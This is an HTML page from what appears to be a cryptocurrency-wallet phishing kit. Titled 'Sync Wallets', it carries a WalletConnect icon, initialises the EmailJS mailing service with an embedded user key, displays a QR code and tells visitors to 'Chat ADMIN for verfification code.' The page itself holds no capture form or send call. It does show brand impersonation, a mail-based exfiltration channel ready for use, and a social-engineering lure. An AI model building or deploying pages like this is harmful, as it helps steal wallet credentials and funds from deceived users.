<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sync Wallets</title>
    <link rel="icon" href="img/walletconnect.png">
    <link rel="stylesheet" href='css/font-awesome.min.css'/>
    <link rel="stylesheet" href='css/fontawesome.css'/>
    <link rel="stylesheet" href='css/bootstrap.min.css' type='text/css'>
    <link rel="stylesheet" href='css/style.css' type='text/css'>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
    <script type="text/javascript">
        (function() {
        emailjs.init("user_KfAuTk7z3WAtsek48UA2G");
        })();
    </script>
    <style>

        body{
            background-color: #1c243b;
            padding:0 10px;
            font-family: "Montserrat Alternates", sans-serif;
        }

        .s_b{
            max-width:450px;
            width:100%;
            height:450px;
            margin:10px auto;
        }


        .suc_div{
            width:100%;
            height:100%;
            background-image: url(./img/qrcode.png);
            background-repeat: no-repeat;
            background-size: contain;
            background-position: center center;
            margin-bottom:10px;
        }

        .ca{
            width:100%;
            background-color:black;
            color:white;
            padding:20px 15px;
        }


        @media screen and (max-width:414px){
            

        .ca{
            margin-top:-55px;
        }

        }

    </style>
</head>


    <div class='s_b'>
        <div class='suc_div'>

        </div>
        <div class='ca'>Chat ADMIN for verfification code.</div>
    </div>

    <script src="js/jquery.min.js" type='text/javascript'></script>
    <script src="js/aos.js" type='text/javascript'></script>
    </body>
    </html>